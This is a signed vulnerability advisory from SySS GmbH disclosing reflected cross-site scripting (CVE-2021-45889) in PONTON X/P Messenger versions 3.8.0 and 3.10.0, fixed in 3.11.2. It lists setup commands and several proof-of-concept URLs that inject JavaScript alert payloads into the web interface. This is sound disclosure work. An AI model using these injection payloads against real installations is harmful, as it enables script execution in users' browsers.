-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Advisory ID: SYSS-2021-078 Product: PONTON X/P Messenger Manufacturer: PONTON GmbH Affected Version(s): 3.8.0 (Build 201909201204), 3.10.0 (Build 202009171429) Tested Version(s): 3.8.0 (Build 201909201204), 3.10.0 (Build 202009171429) Vulnerability Type: Reflected Cross-Site Scripting (CWE-79) Risk Level: Medium Solution Status: Fixed in release of version 3.11.2 Manufacturer Notification: 2022-01-25 Solution Date: 2022-02-07 Public Disclosure: 2022-03-11 CVE Reference: CVE-2021-45889 Author of Advisory: Stefan Walter, Thibaud Kehler, Tarek Awadallah (SySS GmbH) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: The manufacturer describes the product as follows (see [1]): > The PONTON X/P Messenger (or PONTON X/P for short) is PONTON’s > high-quality B2B integration solution with a proven track-record in > several industries since 2001. PONTON X/P is a highly configurable > ebXML, AS/1, AS/2, AS/3 and AS/4 compliant messaging software. It > provides additional features to deal with typical B2B integration > issues (such as a listener component for the DMZ, certificate > management and non-repudiation of messages). PONTON X/P is typically > used as communication layer in a business consortium or as an (OEM) > communication extension of an existing software application. The tested version was not the most recent one. The current versions 4.X were not affected. The vulnerability can only be exploited by authorisation with a user of the Ponton X/P web UI which is normally only accessible on the internal network. The vulnerability is fixed with Ponton X/P Version 3.11.2. Please upgrade to the Version 3.11.2. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details: Several functions are vulnerable to reflected cross-site scripting. For testing purposes, a local installation was set up using the application binaries provided at [2] and the instructions at [3]: $ wget 'https://www.ponton.de/downloads/xp/3.10/PontonXP-Messenger-3.10.0-Linux.zip' $ unzip PontonXP-Messenger-3.10.0-Linux.zip -d PontonXP-Messenger-3.10.0-Linux $ cd PontonXP-Messenger-3.10.0-Linux $ ./pontonxp start Afterwards, the web application is reachable at https://localhost:8443. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept (PoC): SySS GmbH identified three different categories of reflected cross-site scripting: The first category can be triggered by visiting, for example, https://localhost:8443/pontonxp/private/index.jsp?partners/ShowNonLocalPartners.do?localID=%27-prompt(%22SySS%20RXSS%20PoC%22)//. As can be seen in the following excerpt of the server response, the payload is injected directly into a JavaScript context: The second category can be triggered by visiting https://localhost:8443/pontonxp/private/index.jsp?javascript:alert(%27SySS_RXSS_PoC%27). As can be seen in the following excerpt of the server response, the payload is injected into the iframe src and then executed:
The third category can be triggered by visiting either one of the following URLs (the list is non-exhaustive): * https://localhost:8443/pontonxp/private/index.jsp?database/databaseTab.jsp?syss%22%3E%3C/iframe%3E%3Cscript%3Ealert(%22SySS%20RXSS%20PoC%22);%3C/script%3E * https://localhost:8443/pontonxp/private/index.jsp?activation/activationMainTab.jsp?syss%22%3E%3C/iframe%3E%3Cscript%3Ealert(%22SySS%20RXSS%20PoC%22);%3C/script%3E * https://localhost:8443/pontonxp/private/index.jsp?communication/serverTab.jsp?syss%22%3E%3C/iframe%3E%3Cscript%3Ealert(%22SySS%20RXSS%20PoC%22);%3C/script%3E * https://localhost:8443/pontonxp/private/index.jsp?emailNotification/notificationTab.jsp?ucbgm%22%3E%3C/iframe%3E%3Cscript%3Ealert(%22SySS%20RXSS%20PoC%22);%3C/script%3E As can be seen in the following excerpt of the server response for the first request in the list, the payload is used to break out of the iframe src and to execute code by inserting a new script tag: